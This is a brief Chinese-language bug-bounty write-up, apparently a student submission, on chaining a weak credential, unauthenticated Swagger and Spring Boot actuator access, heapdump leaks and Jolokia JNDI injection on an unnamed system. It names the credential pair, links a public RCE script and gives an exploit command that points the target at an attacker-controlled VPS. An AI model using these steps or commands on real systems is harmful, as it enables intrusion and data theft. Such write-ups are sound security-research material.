No.0
前言
漏洞基本上已修复
No.1
入口
从config.js获取大量接口实现漏洞大满贯
No.2
弱口令dev/DevAdmin
No.3
swagger未授权访问+信息泄露
swagger中有大量接口,可通过接口进行功能测试,通过叠加page和pageSize参数实现未授权获取敏感信息
No.4
springboot未授权访问
推荐工具JDumpSpider-1.0-SNAPSHOT-full.jar和heapdump_tool.jar
/env
/heapdump
对应第一个弱口令
获取其他的敏感信息
No.5
heapdump文件下载
No.6
信息泄露
有的人会自作聪明改了泄露的默认密码,但是忽略了logfile中记录的大量登录日志
通过日志找到对方修改的密码
No.7
jolokia jndi注入
当携带createJNDIRealm参数时候可尝试利用rce
推荐脚本
https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/s
pringboot-realm-jndi-rce.py
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [VPS]
python3 jolokia.py
对方反弹回显,但由于对方有waf或者等等设备,并未getshell
成果展示:由于通用web弱口令提交cnvd会变成事件型,就没有提交,只提交了heapdump信息泄露漏洞
PS: Src学员投稿
No.8
原文始发于微信公众号(隐雾安全):某系统存在弱口令+未授权+命令执行+信息泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论